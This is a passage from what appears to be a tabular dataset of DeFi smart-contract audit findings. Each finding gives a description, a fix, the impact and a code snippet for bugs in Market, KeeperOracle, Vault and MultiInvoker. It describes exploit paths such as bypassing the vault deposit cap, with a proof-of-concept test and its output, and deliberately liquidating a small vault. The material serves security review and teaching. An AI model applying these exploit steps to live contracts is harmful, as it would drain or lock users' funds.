This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.","```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n" +"Invalid oracle version can cause the `maker` position to exceed `makerLimit`, temporarily or permanently bricking the Market contract",medium,"When invalid oracle version happens, positions pending at the oracle version are invalidated with the following pending positions increasing or decreasing in size. When this happens, all position limit checks are not applied (and can't be cancelled/modified), but they are still verified for the final positions in _invariant. This means that many checks are bypassed during such event. There is a protection against underflow due to this problem by enforcing the calculated `closable` value to be 0 or higher. However, exactly the same problem can happen with overflow and there is no protection against it.\\nFor example:\\nLatest global maker = maker limit = 1000\\nPending global maker = 500 [t=100]\\nPending global maker = 1000 [t=200]\\nIf oracle version at t = 100 is invalid, then pending global maker = 1500 (at t = 200). 
However, due to this check in _invariant:\\n```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n\\nall Market updates will revert except update to reduce maker position by 500+, which might not be even possible in 1 update depending on maker distribution between users. For example, if 5 users have maker = 300 (1500 total), then no single user can update to reduce maker by 500. This will temporarily brick Market (all updates will revert) until coordinator increases maker limit. If the limit is already close to max possible (2^62-1), then the contract will be bricked permanently (all updates will revert regardless of maker limit, because global maker will exceed 2^62-1 in calculations and will revert when trying to store it).\\nThe same issue can also cause the other problems, such as:\\nBypassing the market utilization limit if long/short is increased above maker\\nUser unexpectedly becomes liquidatable with too high position (for example: position 500 -> pending 0 -> pending 500 - will make current = 1000 if middle oracle version is invalid)","The same issue for underflow is already resolved by using `closable` and enforcing such pending positions that no invalid oracle can cause the position to be less than 0. 
This issue can be resolved in the same way, by introducing some `openable` value (calculated similar to `closable`, but in reverse - when position is increased, it's increased, when position is decreased, it doesn't change) and enforcing different limits, such that settled position + openable:\\ncan not exceed the max maker\\ncan not break utilization\\nfor local position - calculate maxMagnitude amount from `settled + local openable` instead of absolute pending position values for margined/maintained calculations.","If current maker is close to maker limit, and some user(s) reduce their maker then immediately increase back, and the oracle version is invalid, maker will be above the maker limit and the Market will be temporarily bricked until coordinator increases the maker limit. Even though it's temporary, it is still bricked for some time and coordinator is forced to increase maker limit, breaking the intended market config. Furthermore, once the maker limit is increased, there is no guarantee that the users will reduce it so that the limit can be reduced back.\\nAlso, for some low-price tokens, the maker limit can be close to max possible value (2^62-1 is about `4*1e18` or Fixed6(4*1e12)). If the token price is about $0.00001, this means such maker limit allows `$4*1e7` or $40M. So, if low-value token with $40M maker limit is used, this issue will lead to maker overflow 2^62-1 and bricking the Market permanently, with all users being unable to withdraw their funds, losing everything.\\nWhile this situation is not very likely, it's well possible. 
For example, if the maker is close to limit, any maker reducing the position will have some other user immediately take up the freed up maker space, so things like global maker change of: 1000->900->1000 are easily possible and any invalid oracle version will likely cause the maker overflowing the limit.",```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n +"`KeeperOracle.request` adds only the first pair of market+account addresses per oracle version to callback list, ignoring all the subsequent ones",medium,"The new feature introduced in 2.1 is the callback called for all markets and market+account pairs which requested the oracle version. These callbacks are called once the corresponding oracle settles. For this reason, `KeeperOracle` keeps a list of markets and market+account pairs per oracle version to call market.update on them:\\n```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n\\nHowever, currently `KeeperOracle` stores only the market+account from the first request call per oracle version, because if the request was already made, it returns from the function before adding to the list:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n@@@ if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n\\n // @audit only the first request per version reaches these lines to add market+account to callback list\\n _globalCallbacks[currentTimestamp].add(address(market));\\n 
_localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n}\\n```\\n\\nAccording to docs, the same `KeeperOracle` can be used by multiple markets. And every account requesting in the same oracle version is supposed to be called back (settled) once the oracle version settles.","Move addition to callback list to just before the condition to exit function early:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n}\\n```\\n",The new core function of the protocol doesn't work as expected and `KeeperOracle` will fail to call back markets and accounts if there is more than 1 request in the same oracle version (which is very likely).,```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n +`KeeperOracle.commit` will revert and won't work for all markets if any single `Market` is paused.,medium,"According to protocol design (from KeeperOracle comments), multiple markets may use the same KeeperOracle instance:\\n```\\n/// @dev One instance per price feed should be deployed. 
Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n\\nHowever, if `KeeperOracle` is used by several `Market` instances, and one of them makes a request and is then paused before the settlement, `KeeperOracle` will be temporarily bricked until `Market` is unpaused. This happens, because `KeeperOracle.commit` will revert in market callback, as `commit` iterates through all requested markets and calls `update` on all of them, and `update` reverts if the market is paused.\\nThis means that pausing of just 1 market will basically stop trading in all the other markets which use the same `KeeperOracle`, disrupting protocol usage. When `KeeperOracle.commit` always reverts, it's also impossible to switch oracle provider from upstream `OracleFactory`, because provider switch still requires the latest version of previous oracle to be commited, and it will be impossible to commit it (both valid or invalid, requested or unrequested).\\nAdditionally, the market's `update` can also revert for some other reasons, for example if maker exceeds the maker limit after invalid oracle as described in the other issue.\\nAnd for another problem (although a low severity, but caused in the same lines), if too many markets are authorized to call `KeeperOracle.request`, the markets callback gas usage might exceed block limit, making it impossible to call `commit` due to not enough gas. 
Currently there is no limit of the amount of Markets which can be added to callback queue.\\n`KeeperOracle.commit` calls back `update` in all markets which called `request` in the oracle version:\\n```\\nfor (uint256 i; i < _globalCallbacks[version.timestamp].length(); i++)\\n _settle(IMarket(_globalCallbacks[version.timestamp].at(i)), address(0));\\n// rest of code\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nIf any `Market` is paused, its `update` function will revert (notice the `whenNotPaused` modifier):\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n```\\n\\nThis means that if any `Market` is paused, all the other markets will be unable to continue trading since `commit` in their oracle provider will revert. It will also be impossible to successfully switch to a new provider for these markets, because previous oracle provider must still `commit` its latest request before fully switching to a new oracle provider:\\n```\\nfunction _latestStale(OracleVersion memory currentOracleLatestVersion) private view returns (bool) {\\n if (global.current == global.latest) return false;\\n if (global.latest == 0) return true;\\n\\n@@@ if (uint256(oracles[global.latest].timestamp) > oracles[global.latest].provider.latest().timestamp) return false;\\n if (uint256(oracles[global.latest].timestamp) >= currentOracleLatestVersion.timestamp) return false;\\n\\n return true;\\n}\\n```\\n","Consider catching and ignoring revert, when calling `update` for the market in the `_settle` (wrap in try .. 
catch).\\nConsider adding a limit of the number of markets which are added to callback queue in each oracle version, or alternatively limit the number of authorized markets to call `request`.",One paused market will stop trading in all the markets which use the same oracle provider (KeeperOracle).,```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n +Vault `_maxDeposit` incorrect calculation allows to bypass vault deposit cap,medium,"Vault has a deposit cap risk setting, which is the max amount of funds users can deposit into the vault. The problem is that `_maxDeposit` function, which calculates max amount of assets allowed to be deposited is incorrect and always includes vault claimable assets even when the vault is at the cap. This allows malicious (or even regular) user to deposit unlimited amount bypassing the vault cap, if the vault has any assets redeemed but not claimed yet. This breaks the core protocol function which limits users risk, for example when the vault is still in the testing phase and owner wants to limit potential losses in case of any problems.\\n`Vault._update` limits the user deposit to `_maxDeposit()` amount:\\n```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n\\nWhen calculating max deposit, the vault's collateral consists of vault assets as well as assets which are redeemed but not yet claimed. 
However, the formula used to calculate max deposit is incorrect, it is:\\n`maxDeposit = claimableAssets + (cap - min(collateral, cap))`\\nAs can be seen from the formula, regardless of cap and current collateral, maxDeposit will always be at least claimableAssets, even when the vault is already at the cap or above cap, which is apparently wrong. The correct formula should subtract claimableAssets from collateral (or 0 if claimableAssets is higher than collateral) instead of adding it to the result:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nCurrent incorrect formula allows to deposit up to claimable assets amount even when the vault is at or above cap. This can either be used by malicious user (user can deposit up to cap, redeem, deposit amount = up to cap + claimable, redeem, ..., repeat until target deposit amount is reached) or can happen itself when there are claimable assets available and vault is at the cap (which can easily happen by itself if some user forgets to claim or it takes long time to claim).\\nBypass of vault cap is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('bypass vault deposit cap', async () => {\\n console.log(""start"");\\n\\n await vault.connect(owner).updateParameter({\\n cap: parse6decimal('100'),\\n });\\n\\n await updateOracle()\\n\\n var deposit = parse6decimal('100')\\n console.log(""Deposit 100"")\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n\\n // additional deposit reverts due to cap\\n var deposit = parse6decimal('10')\\n console.log(""Deposit 10 revert"")\\n await expect(vault.connect(user).update(user.address, deposit, 0, 0)).to.be.reverted;\\n\\n // now redeem 50\\n var redeem = parse6decimal('50')\\n console.log(""Redeem 50"")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n 
await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n\\n // deposit 100 (50+100=150) doesn't revert, because assets = 50\\n var deposit = parse6decimal('100')\\n console.log(""Deposit 100"")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n\\n var deposit = parse6decimal('50')\\n console.log(""Deposit 50"")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log(""Vault assets: "" + assets);\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nDeposit 100\\nVault assets: 100000000\\nDeposit 10 revert\\nRedeem 50\\nVault assets: 50000000\\nDeposit 100\\nVault assets: 150000000\\nDeposit 50\\nVault assets: 200000000\\n```\\n\\nThe vault cap is set to 100 and is then demonstrated that it is bypassed and vault assets are set at 200 (and can be continued indefinitely)","The correct formula to `_maxDeposit` should be:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nSo the code can be:\\n```\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.parameter.cap.sub(collateral.sub(context.global.assets.min(collateral)).min(context.parameter.cap));\\n}\\n```\\n","Malicious and regular users can bypass vault deposit cap, either intentionally or just in the normal operation when some users redeem and claimable assets are available in the vault. 
This breaks core contract security function of limiting the deposit amount and can potentially lead to big user funds loss, for example at the initial stages when the owner still tests the oracle provider/market/etc and wants to limit vault deposit if anything goes wrong, but gets unlimited deposits instead.",```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n +Pending keeper and position fees are not accounted for in vault collateral calculation which can be abused to liquidate vault when it's small,medium,"Vault opens positions in the underlying markets trying to keep leverage at the level set for each market by the owner. However, it uses sum of market collaterals which exclude keeper and position fees. But pending fees are included in account health calculations in the `Market` itself.\\nWhen vault TVL is high, this difference is mostly unnoticable. However, if vault is small and keeper fee is high enough, it's possible to intentionally add keeper fees by depositing minimum amounts from different accounts in the same oracle version. 
This keeps/increases vault calculated collateral, but its pending collateral in underlying markets reduces due to fees, which increases actual vault leverage, so it's possible to increase vault leverage up to maximum leverage possible and even intentionally liquidate the vault.\\nEven when the vault TVL is not low but keeper fee is large enough, the other issue reported allows to set vault leverage to max (according to margined amount) and then this issue allows to reduce vault collateral even further down to maintained amount and then commit slightly worse price and liquidate the vault.\\nWhen vault leverage is calculated, it uses collateral equal to sum of collaterals of all markets, loaded as following:\\n```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n\\nHowever, market's `local.collateral` excludes pending keeper and position fees. 
But pending fees are included in account health calculations in the `Market` itself (when loading pending positions):\\n```\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n// rest of code\\n if (protected && (\\n !context.closable.isZero() || // @audit-issue even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n@@@ context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n )) revert MarketInvalidProtectionError();\\n// rest of code\\n if (\\n@@@ !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMarginError();\\n\\n if (\\n@@@ !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThis means that small vault deposits from different accounts will be used for fees, but these fees will not be counted in vault underlying markets leverage calculations, allowing to increase vault's actual leverage.",Consider subtracting pending fees when loading underlying markets data context in the vault.,"When vault TVL is small and keeper fees are high enough, it's possible to intentionally increase actual vault leverage and liquidate the vault by creating many small deposits from different user accounts, making the vault users lose their funds.","```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n" +`MultiInvoker._latest` will return `latestPrice = 0` when latest oracle version is invalid causing liquidation to 
send 0 fee to liquidator or incorrect order execution,medium,"There was a slight change of oracle versions handling in 2.1: now each requested oracle version must be commited, either as valid or invalid. This means that now the latest version can be invalid (price = 0). This is handled correctly in `Market`, which only uses timestamp from the latest oracle version, but the price comes either from latest version (if valid) or `global.latestPrice` (if invalid).\\nHowever, `MultiInvoker` always uses price from `oracle.latest` without verifying if it's valid, meaning it will return `latestPrice = 0` if the latest oracle version is invalid. This is returned from the `_latest` function.\\nSuch latest price = 0 leads to 2 main problems:\\nLiquidations orders in MultiInvoker will send 0 liquidation fee to liquidator (will liquidate for free)\\nSome TriggerOrders will trigger incorrectly (canExecuteOrder will return true when the real price didn't reach the trigger price, or false even if the real prices reached the trigger price)\\n`MultiInvoker._latest` has the following code for latest price assignment:\\n```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n\\nThis `latestPrice` is what's returned from the `_latest`, it isn't changed anywhere else. 
Notice that there is no check for latest oracle version validity.\\nAnd this is the code for KeeperOracle._commitRequested:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nNotice that commits made outside the timeout window simply increase `_global.latestIndex` without assigning `_prices`, meaning it remains 0 (invalid). This means that latest oracle version will return price=0 and will be invalid if commited after the timeout from request time has passed.\\nPrice returned by `_latest` is used when calculating liquidationFee:\\n```\\nfunction _liquidationFee(IMarket market, address account) internal view returns (Position memory, UFixed6, UFixed6) {\\n // load information about liquidation\\n RiskParameter memory riskParameter = market.riskParameter();\\n@@@ (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) = _latest(market, account);\\n\\n // create placeholder order for liquidation fee calculation (fee is charged the same on all sides)\\n Order memory placeholderOrder;\\n placeholderOrder.maker = Fixed6Lib.from(closableAmount);\\n\\n return (\\n latestPosition,\\n placeholderOrder\\n@@@ .liquidationFee(OracleVersion(latestPosition.timestamp, latestPrice, true), riskParameter)\\n .min(UFixed6Lib.from(market.token().balanceOf(address(market)))),\\n closableAmount\\n );\\n}\\n```\\n\\n`liquidationFee` calculation in order multiplies order size by `latestPrice`, meaning it will be 0 when price = 0. 
This liquidation fee is then used in `market.update` for liquidation fee to receive by liquidator:\\n```\\n function _liquidate(IMarket market, address account, bool revertOnFailure) internal isMarketInstance(market) {\\n@@@ (Position memory latestPosition, UFixed6 liquidationFee, UFixed6 closable) = _liquidationFee(market, account);\\n Position memory currentPosition = market.pendingPositions(account, market.locals(account).currentId);\\n currentPosition.adjust(latestPosition);\\n\\n try market.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n@@@ Fixed6Lib.from(-1, liquidationFee),\\n true\\n```\\n\\nThis means liquidator will receive 0 fee for the liquidation.\\nIt is also used in canExecuteOrder:\\n```\\n function _executeOrder(address account, IMarket market, uint256 nonce) internal {\\n if (!canExecuteOrder(account, market, nonce)) revert MultiInvokerCantExecuteError();\\n// rest of code\\n function canExecuteOrder(address account, IMarket market, uint256 nonce) public view returns (bool) {\\n TriggerOrder memory order = orders(account, market, nonce);\\n if (order.fee.isZero()) return false;\\n@@@ (, Fixed6 latestPrice, ) = _latest(market, account);\\n@@@ return order.fillable(latestPrice);\\n }\\n```\\n\\nMeaning `canExecuteOrder` will do comparision with price = 0 instead of real latest price. 
For example: limit buy order to buy when price <= 1000 (when current price = 1100) will trigger and execute buy at the price = 1100 instead of 1000 or lower.","`_latest` should replicate the process for the latest price from `Market` instead of using price from the oracle's latest version:\\nif the latest oracle version is valid, then use its price\\nif the latest oracle version is invalid, then iterate all global pending positions backwards and use price of any valid oracle version at the position.\\nif all pending positions are at invalid oracles, use market's `global.latestPrice`","liquidation done after invalid oracle version via `MultiInvoker` `LIQUIDATE` action will charge and send 0 liquidation fee from the liquidating account, thus liquidator loses these funds.\\nsome orders with comparison of type -1 (<= price) will incorrectly trigger and will be executed when price is far from reaching the trigger price. This loses user funds due to unexpected execution price of the pending order.",```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n +`MultiInvoker._latest` calculates incorrect closable for the current oracle version causing some liquidations to revert,medium,"`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. There is one tricky edge case at the current oracle version which is calculated incorrectly in `MultiInvoker` (and also in Vault). This happens when pending position is updated in the current active oracle version: it is allowed to set this current position to any value conforming to `closable` of the previous pending (or latest) position. 
For example:\\nlatest settled position = 10\\nuser calls update(20) - pending position at t=200 is set to 20. If we calculate `closable` normally, it will be 10 (latest settled position).\\nuser calls update(0) - pending position at t=200 is set to 0. This is valid and correct. It looks as if we've reduced position by 20, bypassing the `closable` = 10 value, but in reality the only enforced `closable` is the previous one (for latest settled position in the example, so it's 10) and it's enforced as a change from previous position, not from current.\\nNow, if the step 3 happened in the next oracle version, so 3. user calls update(0) - pending position at t=300 will revert, because user can't close more than 10, and he tries to close 20.\\nSo in such tricky edge case, `MultiInvoker` (and Vault) will calculate `closable = 10` and will try to liquidate with position = 20-10 = 10 instead of 0 and will revert, because `Market._invariant` will calculate `closable = 10` (latest = 10, pending = 10, closable = latest = 10), but it must be 0 to liquidate (step 3. 
in the example above)\\nIn `Vault` case, this is less severe as the market will simply allow to redeem and will close smaller amount than it actually can.\\nWhen `Market` calculates `closable`, it's calculated starting from latest settled position up to (but not including) current position:\\n```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n\\nPay attention to `id < context.local.currentId` - the loop doesn't include currentId.\\nAfter the current position is updated to a new user specified value, only then the current position is processed and closable now includes new user position change from the previous position:\\n```\\nfunction _update(\\n // rest of code\\n // load\\n _loadUpdateContext(context, account);\\n // rest of code\\n context.currentPosition.local.update(collateral);\\n // rest of code\\n // process current position\\n _processPendingPosition(context, context.currentPosition.local);\\n // rest of code\\n // after\\n _invariant(context, account, newOrder, collateral, protected);\\n```\\n\\nThe `MultiInvoker._latest` logic is different and simply includes calculation of `closable` for all pending positions:\\n```\\nfor (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n 
.sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n}\\n```\\n\\nThe same incorrect logic is in a Vault:\\n```\\n// pending positions\\nfor (uint256 id = marketContext.local.latestId + 1; id <= marketContext.local.currentId; id++)\\n previousClosable = _loadPosition(\\n marketContext,\\n marketContext.currentAccountPosition = registration.market.pendingPositions(address(this), id),\\n previousClosable\\n );\\n```\\n","When calculating `closable` in `MultiInvoker` and `Vault`, add the following logic:\\nif timestamp of pending position at index currentId equals current oracle version, then add the difference between position size at currentId and previous position size to `closable` (both when that position increases and decreases).\\nFor example, if\\nlatest settled position = `10`\\npending position at t=200 = 20 then initialize `closable` to `10` (latest) add (pending-latest) = (20-10) to `closable` (closable = 20)","In the following edge case:\\ncurrent oracle version = oracle version of the pending position in currentId index\\nAND this (current) pending position increases compared to previous pending/settled position\\nThe following can happen:\\nliquidation via `MultiInvoker` will revert (medium impact)\\nvault's `maxRedeem` amount will be smaller than actual allowed amount, position will be reduced by a smaller amount than they actually can (low impact)","```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n" +MultiInvoker closableAmount the calculation logic is wrong,medium,"in `MultiInvoker._latest()` The incorrect use of `previousMagnitude = latestPosition.magnitude()` has led to an error in the calculation of `closableAmount`. 
This has caused errors in judgments that use this variable, such as `_liquidationFee()`.\\nThere are currently multiple places where the user's `closable` needs to be calculated, such as `market.update()`. The calculation formula is as follows in the code: `Market.sol`\\n```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n\\nIt will loop through `pendingPostion`, and each loop will set the variable `context.previousPendingMagnitude = newPendingPosition.magnitude();` to be used as the basis for the calculation of the next `pendingPostion`.\\n`closableAmount` is also calculated in `MultiInvoker._latest()`. 
The current implementation is as follows:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n }\\n```\\n\\nThis method also loops through `pendingPosition`, but incorrectly uses `latestPosition.magnitude()` to set `previousMagnitude`, `previousMagnitude` = latestPosition.magnitude();. The correct way should be `previousMagnitude = currentPendingPosition.magnitude()` like `market.sol`. 
This mistake leads to an incorrect calculation of `closableAmount`.","```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready// Remove the line below\\nto// Remove the line below\\nbe// Remove the line below\\nsettled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId // Add the line below\\n 1; id <= local.currentId; id// Add the line below\\n// Add the line below\\n) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n// Remove the line below\\n previousMagnitude = latestPosition.magnitude();\\n// Add the line below\\n previousMagnitude = pendingPosition.magnitude();\\n }\\n }\\n }\\n```\\n","The calculation of `closableAmount` is incorrect, which leads to errors in the judgments that use 
